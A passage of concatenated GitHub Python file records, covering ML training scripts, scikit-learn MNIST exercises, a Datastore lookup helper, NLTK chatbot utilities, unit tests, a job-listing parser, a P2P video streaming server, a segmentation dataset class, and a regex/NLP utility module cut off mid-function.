args.output_type == \"Pointcloud\":\n val_loss = val_one_epoch(net, args, test_dataloader, epoch)\n if best_loss > val_loss:\n best_loss = val_loss\n filename = '{}.pt'.format(\"best\")\n logging.info(\"Saving Model........{}\".format(filename))\n helper.save_checkpoint(osp.join(args.checkpoint_dir, filename), net, args, optimizer, scheduler, epoch)\n\n filename = '{}.pt'.format(\"last\")\n logging.info(\"Saving Model........{}\".format(filename))\n helper.save_checkpoint(osp.join(args.checkpoint_dir, filename), net, args, optimizer, scheduler, epoch)\n\n\nif __name__ == \"__main__\":\n main() \n ","repo_name":"AutodeskAILab/Clip-Forge","sub_path":"train_autoencoder.py","file_name":"train_autoencoder.py","file_ext":"py","file_size_in_byte":19743,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"53"} +{"seq_id":"42592162011","text":"#%%\nfrom sklearn.datasets import fetch_mldata\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nmnist = fetch_mldata('MNIST original')\nX, y = mnist['data'], mnist['target']\n\nsome_digit = X[36000]\nsome_digit_image = some_digit.reshape(28, 28)\nplt.imshow(some_digit_image, cmap=plt.cm.binary, interpolation=\"nearest\")\nplt.axis('off')\nplt.show()\n\nX_train, X_test, y_train, y_test = X[:60000], X[60000:], y[:60000], y[60000:]\n\n# shuffle training set\nshuffle_index = np.random.permutation(60000)\nX_train, y_train = X_train[shuffle_index], y_train[shuffle_index]\n\n\n#%%\nfrom sklearn.linear_model import SGDClassifier\n\n# train a binary \"5\" classifier\ny_train_5 = (y_train == 5)\ny_test_5 = (y_test == 5)\nsgd_clf = SGDClassifier(random_state=42)\nsgd_clf.fit(X_train, y_train_5)\nsgd_clf.predict([some_digit])\n\n#%%\n# evaluate the model\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import f1_score\n\ncross_val_score(sgd_clf, X_train, y_train_5, cv=3, scoring=\"accuracy\")\n\ny_train_pred = cross_val_predict(sgd_clf, X_train, y_train_5, cv=3)\nconfusion_matrix(y_train_5, y_train_pred)\nf1_score(y_train_5, y_train_pred)\n\n#%%\n# play with precision and recall\nfrom sklearn.metrics import precision_recall_curve\n\ny_scores = cross_val_predict(\n sgd_clf, X_train, y_train_5, cv=3, method='decision_function')\n\nprecisions, recalls, thresholds = precision_recall_curve(y_train_5, y_scores)\n\n\ndef plot_precision_recall_vs_threshold(precisions, recalls, thresholds):\n plt.plot(thresholds, precisions[:-1], \"b--\", label=\"Precision\")\n plt.plot(thresholds, recalls[:-1], \"g-\", label=\"Recall\")\n plt.xlabel(\"Threshold\")\n plt.legend(loc=\"upper left\")\n plt.ylim([0, 1])\n\n\nplot_precision_recall_vs_threshold(precisions, recalls, thresholds)\nplt.show()\n\n#%%\n# roc curve\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import roc_auc_score\n\nfpr, tpr, thresholds = roc_curve(y_train_5, y_scores)\n\n\ndef plot_roc_curve(fpr, tpr, label=None):\n plt.plot(fpr, tpr, linewith=2, label=label)\n plt.plot([0, 1], [0, 1], \"k--\")\n plt.axis([0, 1, 0, 1])\n plt.xlabel(\"False Positive Rate\")\n plt.ylabel(\"True Positive Rate\")\n\n\nplot_roc_curve(fpr, tpr)\nplt.show()\n\nroc_auc_score(y_train_5, y_scores)\n\n#%%\n# try random forest classifier and compare roc with sgd\nfrom sklearn.ensemble import RandomForestClassifier\n\nforest_clf = RandomForestClassifier(random_state=42)\ny_probas_forest = cross_val_predict(\n forest_clf, X_train, y_train_5, cv=3, method='predict_proba')\n\ny_scores_forest = y_probas_forest[:, 1] #  score= proba of positive class\nfpr_forest, tpr_forest, thresholds_forest = roc_curve(\n y_train_5, y_scores_forest)\n\nplt.plot(fpr, tpr, \"b:\", label='SGD')\nplot_roc_curve(fpr_forest, tpr_forest, \"Random Forest\")\nplt.legend(\"lower right\")\n\nroc_auc_score(y_train_5, y_scores_forest)\n\n#%% multiclass classifier\nfrom sklearn.preprocessing import StandardScaler\n\nsgd_clf.fit(X_train, y_train)\nsgd_clf.predict([some_digit])\n\ncross_val_score(sgd_clf, X_train, y_train, cv=3, scoring=\"accuracy\")\n\n# scale features and re-evaluate\nscaler = StandardScaler()\nX_train_scaled = scaler.fit_transform(X_train.astype(np.float64))\ncross_val_score(sgd_clf, X_train_scaled, y_train, cv=3, scoring=\"accuracy\")\n\n#%%\n# error analysis\ny_train_pred = cross_val_predict(sgd_clf, X_train_scaled, y_train, cv=3)\nconf_mx = confusion_matrix(y_train, y_train_pred)\nplt.matshow(conf_mx, cmap=plt.cm.gray)\n\nrow_sums = conf_mx.sum(axis=1, keepdims=True)\nnorm_conf_mx = conf_mx / row_sums\nnp.fill_diagonal(norm_conf_mx, 0)\nplt.matshow(norm_conf_mx, cmap=plt.cm.gray)\n\n#%%\n# multilabel classification\nfrom sklearn.neighbors import KNeighborsClassifier\n\ny_train_large = (y_train >= 7)\ny_train_odd = (y_train % 2 == 1)\ny_multilabel = np.c_[y_train_large, y_train_odd]\n\nknn_clf = KNeighborsClassifier()\nknn_clf.fit(X_train, y_multilabel)\n\nknn_clf.predict([some_digit])\ny_train_knn_pred = cross_val_predict(knn_clf, X_train, y_train, cv=3)\nf1_score(y_train, y_train_knn_pred, average='macro')\n\n#%%\n# multioutput classification\nnoise = np.random.randint(0, 100, (len(X_train), 784))\nX_train_mod = X_train + noise\nnoise = np.random.randint(0, 100, (len(X_test), 784))\nX_test_mod = X_test + noise\ny_train_mod = X_train\ny_test_mod = X_test\n\nknn_clf.fit(X_train_mod, y_train_mod)\nclean_digit = knn_clf.predict([X_test_mod[3450]])\n\n\ndef plot_digit(data):\n image = data.reshape(28, 28)\n plt.imshow(image, cmap=matplotlib.cm.binary,\n interpolation=\"nearest\")\n plt.axis(\"off\")\n\n\nplot_digit(clean_digit)\n\n#%%\n# Exercise 1\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import RandomizedSearchCV\nimport numpy as np\n\nweights = ['uniform', 'distance'] \nnumNeighbors = [3, 4, 5]\nparam_grid = dict(weights=weights, n_neighbors=numNeighbors)\n\n\ngrid = RandomizedSearchCV(KNeighborsClassifier(), param_grid, cv=3, n_iter=5)\ngrid.fit(X_train, y_train)\n\ncross_val_score(grid, X_test, y_test, cv=3, scoring=\"accuracy\")\n\n# %%\n# Exercise 2\nfrom scipy.ndimage.interpolation import shift\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import cross_val_score\n\nX_train_augumented = X_train.tolist()\ny_train_augumented = y_train.tolist()\n\nfor i in range(X_train.shape[0]):\n image = X_train[i].reshape(28, 28)\n shift_up = shift(image, [-1, 0], cval=0).reshape([-1])\n shift_down = shift(image, [1, 0], cval=0).reshape([-1])\n shift_right = shift(image, [0, 1], cval=0).reshape([-1])\n shift_left = shift(image, [0, -1], cval=0).reshape([-1])\n\n X_train_augumented.append(shift_up)\n X_train_augumented.append(shift_down)\n X_train_augumented.append(shift_right)\n X_train_augumented.append(shift_left)\n\n y_train_augumented.append(y_train[i])\n y_train_augumented.append(y_train[i])\n y_train_augumented.append(y_train[i])\n y_train_augumented.append(y_train[i])\n\nX_train_augumented = np.array(X_train_augumented)\ny_train_augumented = np.array(y_train_augumented)\nshuffle_index = np.random.permutation(60000)\nX_train_augumented, y_train_augumented = X_train_augumented[shuffle_index], y_train_augumented[shuffle_index]\n\nknn_clf = KNeighborsClassifier()\nknn_clf.fit(X_train_augumented, y_train_augumented)\n\ncross_val_score(knn_clf, X_test, y_test, cv=3, scoring=\"accuracy\")","repo_name":"joaoflf/handson-ml","sub_path":"chapter3.py","file_name":"chapter3.py","file_ext":"py","file_size_in_byte":6435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33061050889","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\n\nCOMPARISON_OPERATORS = ('gt', 'gte', 'lt', 'lte', 'in',)\nLOOKUP_SEP = '__'\n\n\ndef convert_lookups(**query):\n \"\"\"\n Transform a query from Django-style format to Datasore format.\n\n :return: An iterable of filters suitable to pass to :meth:`~gcloudoem.datastore.query.Query.add_filter`.\n \"\"\"\n filters = []\n for key, value in sorted(query.items()):\n parts = key.rsplit(LOOKUP_SEP)\n parts = [part for part in parts if not part.isdigit()]\n # Figure out the operator\n\n op = 'eq'\n if len(parts) > 1 and parts[-1] in COMPARISON_OPERATORS:\n op = parts.pop()\n\n # Convert to datastore notation for key. Just a nice-to-have.\n if parts[0] == 'pk':\n parts[0] = 'key'\n\n # Save the filter\n filters.append((parts[0], op, value,))\n return filters\n","repo_name":"Kapiche/gcloud-datastore-oem","sub_path":"gcloudoem/queryset/lookups.py","file_name":"lookups.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10752420963","text":"import nltk\nimport numpy as np\nimport json \n\nfrom nltk.stem.porter import PorterStemmer \n\nnltk.download('punkt')\nstemmer = PorterStemmer()\n\ndef tokenize(sentence):\n return nltk.word_tokenize(sentence.lower())\n\ndef stem(word):\n return nltk.PorterStemmer().stem(word.lower())\n\n\ndef bag_of_words(tokenized_sentence , all_words):\n tokenized_sentence = [stem(w) for w in tokenized_sentence]\n bag = np.zeros(len(all_words), dtype=np.float32)\n for idx, w in enumerate(all_words):\n if w in tokenized_sentence:\n bag[idx] = 1.0\n return bag\n\ndef dataloader(file):\n\n file_extension = file.split('.')[-1].lower()\n\n if file_extension == 'json':\n with open(file) as f:\n intents = json.load(f)\n else:\n raise Exception('File format not supported')\n\n all_words = []\n tags = []\n\n xy = []\n\n for intent in intents['intents']:\n tag = intent['tag']\n tags.append(tag)\n for pattern in intent['patterns']:\n w = tokenize(pattern)\n all_words.extend(w)\n xy.append((w,tag))\n\n\n ignore_words = ['?','!','.',',']\n all_words = [stem(w) for w in all_words if w not in ignore_words]\n all_words = sorted(set(all_words)) #set is used to remove duplicates\n tags=sorted(set(tags))\n\n\n X_train = []\n y_train = []\n\n for (pattern_sentence,tag) in xy:\n bag = bag_of_words(pattern_sentence,all_words)\n X_train.append(bag)\n\n label = tags.index(tag)\n y_train.append(label)\n\n X_train = np.array(X_train)\n y_train = np.array(y_train)\n\n return X_train,y_train,all_words,tags","repo_name":"varadtechx/boctor","sub_path":"boctor/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1675796064","text":"import os\nimport logging\nimport unittest\nimport pathlib\nfrom pathlib import Path\nfrom unittest.mock import patch, MagicMock\n\nimport stitch_m\nfrom stitch_m.file_handler import create_user_config, create_Windows_shortcut, _create_lnk_file, _get_desktop_path\n\nclass TestSetupFunctions(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n # Set maximum difference string length to None (infinite)\n cls.maxDiff = None\n\n # ------------------\n # Test config setup:\n \n def test_setup_config(self):\n with patch('shutil.copyfile', MagicMock()) as mocked_copyfile:\n local_config_file = Path(stitch_m.__file__).resolve().with_name(\"config.cfg\")\n user_config_location = Path(stitch_m.__file__).parent / \"test_config_path\"\n with patch('stitch_m.file_handler.get_user_config_path', MagicMock(return_value=(user_config_location, []))):\n create_user_config()\n mocked_copyfile.assert_called_once_with(local_config_file, user_config_location)\n\n @patch('stitch_m.file_handler.get_user_config_path')\n @patch('logging.error')\n def test_setup_config_fail_bad_path(self, mocked_error_log, mocked_get_config):\n mocked_get_config.return_value = (Path(os.path.expanduser(\"~/.fake_dir/oh_no/thisisbad.cfg\")), [])\n create_user_config()\n mocked_error_log.assert_called_once_with(\"Unable to create user config file due to directory issues\", exc_info=True)\n\n # ------------------\n # Test Windows shortcut setup:\n\n @patch(\"os.name\")\n @patch('logging.error')\n def test_setup_win_exits_on_linux(self, mocked_error_log, mocked_os_name):\n mocked_os_name.return_value = \"posix\"\n create_Windows_shortcut()\n mocked_error_log.assert_called_once_with(\"This command is only valid on Windows installations.\")\n\n @patch.object(pathlib.Path, \"exists\", MagicMock(return_value=False))\n @patch('logging.error')\n def test_setup_windows_shortcut_function_called(self, mocked_error):\n with patch('stitch_m.file_handler._create_lnk_file', MagicMock()) as mocked_shortcut_creator:\n create_Windows_shortcut()\n if os.name == \"nt\":\n home_dir = Path(os.environ[\"HOMEDRIVE\"]) / os.environ[\"HOMEPATH\"]\n try:\n desktop = _get_desktop_path()\n self.assertTrue(desktop.relative_to(home_dir), \"Invalid desktop found\")\n except Exception:\n logging.warning(\"_get_desktop_path failed\")\n desktop = home_dir / \"Desktop\"\n\n self.assertTrue(desktop.is_dir(), \"Invalid desktop found\")\n mocked_shortcut_creator.assert_called_once_with(desktop / \"StitchM.lnk\")\n else:\n mocked_error.assert_called_once_with(\"This command is only valid on Windows installations.\")\n\n @unittest.skipUnless(os.name == \"nt\", \"Only run on Windows\")\n def test_setup_windows_shortcut_test_created_(self):\n # Only run this test if on Windows\n test_shortcut_path = Path(\".\") / \"test_shortcut.lnk\"\n _create_lnk_file(test_shortcut_path)\n link_created = test_shortcut_path.exists()\n if link_created:\n os.remove(test_shortcut_path)\n self.assertTrue(link_created)\n ","repo_name":"DiamondLightSource/StitchM","sub_path":"src/tests/test_setup_commands.py","file_name":"test_setup_commands.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19500569903","text":"from typing import Any\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nfrom bs4.element import ResultSet, Tag\n\n\nclass JobSoup(BeautifulSoup):\n def __init__(self, source):\n self.job_cards = self._get_job_list(source)\n self.job_dict_list = self._create_job_dict()\n\n def _get_job_list(self, source: str) -> ResultSet[Any]:\n # Extracting all the job cards form our source\n job_screen_soup = BeautifulSoup(source, \"html.parser\")\n job_cards = job_screen_soup.find_all(\n \"div\", {\"class\": \"card card-custom\"}\n )\n return job_cards\n\n def _create_job_dict(self) -> list[dict[str, str]]:\n job_dict_list: list[dict[str, Any]] = list()\n\n # The following functions just get the relevant info\n def get_title(card: Tag) -> tuple[str, str]:\n container = card.findChildren(\"h3\")[0]\n anchor = container.findChildren(\"a\")[0]\n title = anchor.getText().replace(\"\\n\", \"\")\n link = anchor.get(\"href\").replace(\"\\n\", \"\")\n return title.strip(), link.strip()\n\n def get_label(card: Tag, text: str) -> str:\n lable = card.findChildren(\"label\", text=text)[0]\n rate = lable.findNext(\"div\")\n return rate.getText().replace(\"\\n\", \"\").strip()\n\n def get_synopsis(card, element_class) -> str:\n container = card.findChildren(\"div\", {\"class\": element_class})[0]\n synopsis_tag = container.findChildren(\"p\")[0]\n return synopsis_tag.getText().replace(\"\\n\", \"\").strip()\n\n # Populates our job list\n for card in self.job_cards:\n print(type(card))\n title, link = get_title(card)\n job_dict = {\n \"title\": title,\n \"link\": link,\n \"rate\": get_label(card, \"Pay Rate:\"),\n \"created_at\": datetime.strptime(\n get_label(card, \"Date Created:\"), \"%d/%m/%Y\"\n ),\n \"synopsis\": get_synopsis(\n card, \"detail-long-item px-2 render-md\"\n ),\n }\n\n job_dict_list.append(job_dict)\n\n return job_dict_list\n","repo_name":"kamalsacranie/athena-tutor-bot","sub_path":"athena/job_list.py","file_name":"job_list.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6571480395","text":"class Solution(object):\n def findTargetSumWays(self, nums, S):\n \"\"\"\n :type nums: List[int]\n :type S: int\n :rtype: int\n \"\"\"\n def put(newSum, memo, ways):\n if newSum not in memo:\n memo[newSum] = ways\n else:\n memo[newSum] += ways\n \n if nums is None or len(nums) == 0:\n return True if S == 0 else False\n memo = {0:1}\n for ni in nums:\n newMemo = dict()\n for mi in memo:\n ways = memo[mi]\n newSum = mi + ni\n put(newSum, newMemo, ways)\n newSum = mi - ni\n put(newSum, newMemo, ways)\n memo = newMemo\n return memo[S] if S in memo else 0\n","repo_name":"patrick-luo/Leet-Code","sub_path":"494. Target Sum.py","file_name":"494. Target Sum.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38146503965","text":"from threading import Thread\nimport socket, urllib.request, sys, cv2\nimport numpy as np\n\n\nclass P2PServer(Thread):\n def __init__(self, filename, maingui=None, port=2842, address=None, numpeers=1, debug=False):\n Thread.__init__(self)\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.filename = filename\n if address is None:\n self.ext_ip = urllib.request.urlopen('https://ident.me').read().decode('utf8')\n else:\n self.ext_ip = address\n self.debug = debug\n self.port = port\n if self.debug:\n self.printdebuginfo()\n self.server_socket.bind((self.ext_ip, self.port))\n self.server_socket.listen(5)\n self.connections = 0\n self.peers = []\n self.gui = maingui\n if numpeers < 1:\n numpeers = 1\n self.numpeers = numpeers\n self.connection_handler = _Loop(self, self.server_socket)\n self.connection_handler.start()\n\n def run(self):\n cap = cv2.VideoCapture(self.filename)\n buffer = []\n end = False\n running = True\n first = True\n h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n h = h.to_bytes(4, sys.byteorder)\n w = w.to_bytes(4, sys.byteorder)\n while running:\n ret, frame = cap.read()\n if frame is not None:\n data = frame.flatten()\n message = data.tostring()\n size = len(message)\n if self.debug:\n print('Initial Size: ' + str(size))\n size = size.to_bytes(4, sys.byteorder)\n if self.debug:\n print(size)\n message = size + b'' + message\n if first:\n message = h + b'' + w + b'' + message\n first = False\n if self.debug:\n print('Total Size: ' + str(len(message)))\n buffer.append(message)\n else:\n end = True\n for peer in self.peers:\n if not end:\n try:\n peer.senddata(message)\n except BrokenPipeError:\n if self.debug:\n print('The client disconnected')\n peer.discnct()\n else:\n peer.senddisconnect()\n else:\n try:\n buffer.pop(0)\n except:\n if self.debug:\n print('Sent All data')\n running = False\n\n def askdata(self):\n if self.debug:\n inpt = input('Insert the message:\\n')\n length = len(inpt)\n byteslength = length.to_bytes(4, sys.byteorder)\n print(f'Length: {length}')\n text = byteslength + bytes(inpt, 'utf-8')\n return text\n\n def printdebuginfo(self):\n print(f''' -- P2P Server started --\nIP: {self.ext_ip}\nport: {self.port}''')\n\n def stopConnection(self):\n self.server_socket.close()\n\n\nclass _Loop(Thread):\n def __init__(self, server, server_socket, running=True):\n Thread.__init__(self)\n self.server = server\n self.server_socket = server_socket\n self.running = running\n self.first = True\n\n def run(self):\n while True:\n if self.running:\n client_socket, address = self.server_socket.accept()\n self.server.connections += 1\n self.running = self.server.connections < self.server.numpeers\n peer = _P2PConnection(self.server, client_socket, address)\n self.server.peers.append(peer)\n if self.server.connections > 0 and self.first:\n self.first = False\n self.server.start()\n\n\nclass _P2PConnection:\n def __init__(self, server, sock, address):\n self.server = server\n self.sock = sock\n self.address = address\n\n def senddata(self, bytes):\n bytessent = 0\n msglen = len(bytes)\n while bytessent < msglen:\n sent = self.sock.send(bytes[bytessent:])\n if sent == 0:\n self.server.peers.remove(self)\n bytessent += sent\n\n def senddisconnect(self):\n msg = b''\n self.sock.send(msg)\n self.server.peers.remove(self)\n self.sock.close()\n\n def discnct(self):\n self.sock.close()\n self.server.peers.remove(self)\n\ndef main():\n debug = P2PServer(debug=True)\n debug.start()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"John-Bonazzi/CIS457","sub_path":"Semester_project/P2P_Streaming/P2PServer.py","file_name":"P2PServer.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17094590817","text":"from django.core.management import call_command\nfrom django.test import tag, TestCase\n\nfrom oldp.apps.courts.apps import CourtLocationLevel, CourtTypes\nfrom oldp.apps.courts.models import Court\nfrom oldp.apps.courts.processing.processing_steps.enrich_from_wikipedia import ProcessingStep as EnrichFromWikipedia\nfrom oldp.apps.courts.processing.processing_steps.set_aliases import ProcessingStep as SetAliases\nfrom oldp.utils.test_utils import web_test\n\n\n@tag('processing')\nclass CourtsProcessingTestCase(TestCase):\n fixtures = [\n 'locations/countries.json', 'locations/states.json', 'locations/cities.json',\n 'courts/courts.json',\n ]\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n\n @web_test\n def test_enrich_courts_cmd(self):\n opts = {\n 'start': 0,\n 'limit': 3\n }\n call_command('process_courts', *['enrich_from_wikipedia'], **opts)\n\n res = Court.objects.exclude(image__isnull=True).exclude(image__exact='').exclude(description__exact='')\n\n self.assertEqual(len(res), 2, 'There should be 2 enriched courts')\n\n # for r in res:\n # print(r.__dict__)\n\n @web_test\n def test_enrich_court(self):\n step = EnrichFromWikipedia()\n\n court = Court.objects.get(slug='bverfg')\n res = step.process(court)\n\n self.assertEqual(res.image.width, 180, 'Invalid image width')\n self.assertEqual(res.image.height, 249, 'Invalid image height')\n self.assertTrue(res.description.startswith('Das Bundesverfassungsgericht (BVerfG) ist in der Bundesrepublik '\n 'Deutschland das Verfassungsgericht des Bundes.'),\n 'Invalid description')\n\n # Test depends on German court types\n def test_set_aliases(self):\n class TestCourtTypes(CourtTypes):\n def get_types(self):\n return {\n 'AG': {\n 'name': 'Amtsgericht',\n 'levels': [CourtLocationLevel.CITY]\n }\n }\n\n with self.settings(COURT_TYPES=TestCourtTypes()):\n\n step = SetAliases()\n\n # Frankfurt am Main\n step.process(Court.objects.get(pk=2001)).save()\n\n self.assertEqual(2001, Court.objects.get(aliases__contains='AG Frankfurt (Main)').pk)\n\n # for court in Court.objects.filter(pk__gte=1000):\n # res = step.process(court)\n","repo_name":"openlegaldata/oldp","sub_path":"oldp/apps/courts/tests/test_processing.py","file_name":"test_processing.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"53"} +{"seq_id":"1612745158","text":"import os\nfrom torchvision import transforms\nfrom torchvision.datasets import VisionDataset\nimport torchvision.transforms.functional as F\nimport random\nfrom PIL import Image\n\n# Die Class wurde zusammen mit ChatGPT erstellt.\nclass SegmentationDataset(VisionDataset):\n def __init__(self, root, split='train', transform_mode='to_tensor'):\n super(SegmentationDataset, self).__init__(root)\n \n assert split in ['train', 'test', 'validation', 'cropped']\n self.split = split\n self.transform_mode = transform_mode\n \n # Ordnerpfade für Bilder und Masken\n self.images_dir = os.path.join(root, split, 'images')\n self.masks_dir = os.path.join(root, split, 'masks')\n \n # Liste der Dateinamen\n self.images = sorted(os.listdir(self.images_dir))\n self.masks = sorted(os.listdir(self.masks_dir))\n \n assert len(self.images) == len(self.masks)\n\n def transform_to_tensor(self, image, mask):\n to_tensor = transforms.ToTensor()\n image = to_tensor(image)\n mask = to_tensor(mask)\n return image, mask\n\n def transform_normalize(self, image, mask):\n to_tensor = transforms.ToTensor()\n normalize = transforms.Normalize(mean=[0,0,0], std=[1,1,1])\n image = normalize(to_tensor(image))\n mask = to_tensor(mask)\n return image, mask\n\n def transform_flip(self, image, mask):\n to_tensor = transforms.ToTensor()\n normalize = transforms.Normalize(mean=[0,0,0], std=[1,1,1])\n\n if random.random() > 0.5:\n image = F.hflip(image)\n mask = F.hflip(mask)\n\n image = normalize(to_tensor(image))\n mask = to_tensor(mask)\n return image, mask\n \n def transform_color_jitter(self, image, mask):\n color_jitter = transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.1)\n image = color_jitter(image)\n\n to_tensor = transforms.ToTensor()\n normalize = transforms.Normalize(mean=[0,0,0], std=[1,1,1])\n\n image = normalize(to_tensor(image))\n mask = to_tensor(mask)\n\n return image, mask\n\n\n def __getitem__(self, index):\n # Lade das Bild und die entsprechende Maske\n img_path = os.path.join(self.images_dir, self.images[index])\n mask_path = os.path.join(self.masks_dir, self.masks[index])\n \n img = Image.open(img_path).convert(\"RGB\")\n mask = Image.open(mask_path).convert(\"1\")\n \n if self.transform_mode == 'to_tensor':\n img, mask = self.transform_to_tensor(img, mask)\n elif self.transform_mode == 'normalize':\n img, mask = self.transform_normalize(img, mask)\n elif self.transform_mode == 'flip':\n img, mask = self.transform_flip(img, mask)\n elif self.transform_mode == 'color_jitter':\n img, mask = self.transform_color_jitter(img, mask)\n return img, mask\n\n def __len__(self):\n return len(self.images)\n","repo_name":"patschue/Semantic-Segmentation-Landslides","sub_path":"helpers/generate_dataclass.py","file_name":"generate_dataclass.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39728441850","text":"#!/usr/bin/env python3\n#\n# euler235.py / An Arithmetic Geometric sequence\nimport time\nfrom tqdm import tqdm\n\n# Debut du decompte du temps\nstart_time = time.time()\n\ndef u(k,r):\n return (900-3*k)*r**(k-1)\n\ndef s(n,r):\n mysum = 0\n for k in range(1,n+1):\n mysum += u(k,r)\n return mysum\n\ndef find_lower_r():\n sum_to_find = -600000000000\n r = 1.002322\n while (True):\n if s(5000, r) <= sum_to_find:\n print(r)\n print(s(5000,r))\n break\n r += 0.000000000001\n\n# main loop\nsum_to_find = -600000000000\n#find_lower_r()\nprint(s(5000, 1.002322))\nprint(s(5000, 1.002323))\nprint(s(5000, 1.002322108633))\n\n\n# Affichage du temps d execution\nprint(\"Temps d execution : %s secondes ---\" % (time.time() - start_time))\n\n","repo_name":"allagonne/Euler_project","sub_path":"euler235.py","file_name":"euler235.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7808735132","text":"import os\r\nimport re\r\nimport nltk\r\nimport math\r\nimport torch\r\nimport string\r\nimport datetime\r\nimport time\r\nimport pickle\r\nfrom copy import deepcopy\r\nfrom scipy import stats\r\nimport csv\r\nimport sys\r\nimport _thread\r\nfrom threading import Lock, Thread, Timer\r\nimport ctypes\r\nimport inspect\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom scipy.stats import t\r\nfrom enum import Flag, auto\r\nfrom numba import jit, njit, prange\r\nfrom nltk.cluster import KMeansClusterer\r\nfrom gensim.models import fasttext\r\nfrom fuzzywuzzy import fuzz\r\nimport traceback\r\nimport collections\r\nfrom paretoset import paretoset\r\nfrom multiprocessing import cpu_count\r\nimport itertools\r\nimport functools\r\nfrom scipy.special import logit, expit\r\nimport spacy\r\n# from line_profiler import LineProfiler\r\n\r\nfrom source import metainfo\r\n\r\nclass runtime:\r\n\r\n class regularpattern:\r\n\r\n nlp = spacy.load('en_core_web_lg')\r\n\r\n class matchway(Flag):\r\n startwith = auto()\r\n contain = auto()\r\n exact = auto()\r\n ner = auto()\r\n idf = auto()\r\n groups = auto()\r\n\r\n notunicodepattern = u\"([^\\u4e00-\\u9fa5\\u0030-\\u0039\\u0041-\\u005a\\u0061-\\u007a])\"\r\n notunicodepattern_ex = u\"([^\\u4e00-\\u9fa5\\u0030-\\u0039\\u0041-\\u005a\\u0061-\\u007a.*x%])\"\r\n\r\n numberpattern = r'[+-]?([0-9]?[.])?[0-9]+'\r\n modelpattern = '^(([a-zA-Z]+[0-9-]+)|([0-9]+[a-zA-Z-]+))[a-zA-Z0-9-]*$'\r\n operatorpattern = r'[+-]?([+-]?([0-9]?[.])?[0-9]+[.*x%]{1})*([0-9]?[.])?[0-9]+'\r\n grouppatterns = [\r\n [None, matchway.idf, lambda x: runtime.regularpattern.grouppatterns_idf_para != None and len(x) >= 5 and runtime.regularpattern.grouppatterns_idf_para[x] == 1], \\\r\n [None, matchway.idf, lambda x: runtime.regularpattern.grouppatterns_idf_para != None and len(x) >= 5 and runtime.regularpattern.grouppatterns_idf_para[x] == 2], \\\r\n ]\r\n grouppatterns_cooccur_veto = [0, 1]\r\n grouppatterns_cooccur_veto_ground = {0:1}\r\n for eachgroupindex in range(0, len(grouppatterns_cooccur_veto)):\r\n grouppatterns_cooccur_veto[eachgroupindex] = 'w2group_' + str(grouppatterns_cooccur_veto[eachgroupindex])\r\n for eachgroup in dict(grouppatterns_cooccur_veto_ground):\r\n grouppatterns_cooccur_veto_ground['w2group_' + str(eachgroup)] = 'w2group_' + str(grouppatterns_cooccur_veto_ground[eachgroup])\r\n del grouppatterns_cooccur_veto_ground[eachgroup]\r\n grouppatterns_model_para = set(['DATE', 'QUANTITY', 'TIME', 'PERCENT', 'MONEY', 'CARDINAL'])\r\n grouppatterns_idf_para = None\r\n keytoken_extract = [\r\n [['NORP', 'GPE', 'LOC', 'PERSON', 'PRODUCT'], matchway.ner], \\\r\n [['DATE', 'QUANTITY', 'TIME', 'PERCENT', 'MONEY', 'CARDINAL'], matchway.ner], \\\r\n [modelpattern, matchway.exact, lambda x: len(x) >= 8 and len(set([r.label_ for r in runtime.regularpattern.nlp(x, disable=['tagger', 'parser']).ents]).intersection(runtime.regularpattern.grouppatterns_model_para)) == 0], \\\r\n [modelpattern, matchway.exact, lambda x: len(x) >= 6 and len(set([r.label_ for r in runtime.regularpattern.nlp(x, disable=['tagger', 'parser']).ents]).intersection(runtime.regularpattern.grouppatterns_model_para)) == 0]\r\n ]\r\n\r\n @staticmethod\r\n def index(varname):\r\n if type(varname) == str:\r\n varname = varname.split(',')\r\n thepattern = eval('runtime.regularpattern.' + varname[0])\r\n thematchway = eval('runtime.regularpattern.matchway.' + varname[1])\r\n return thepattern, thematchway\r\n else:\r\n return None\r\n\r\n @staticmethod\r\n def ispattern(string, pattern, matchway, bool = False):\r\n if 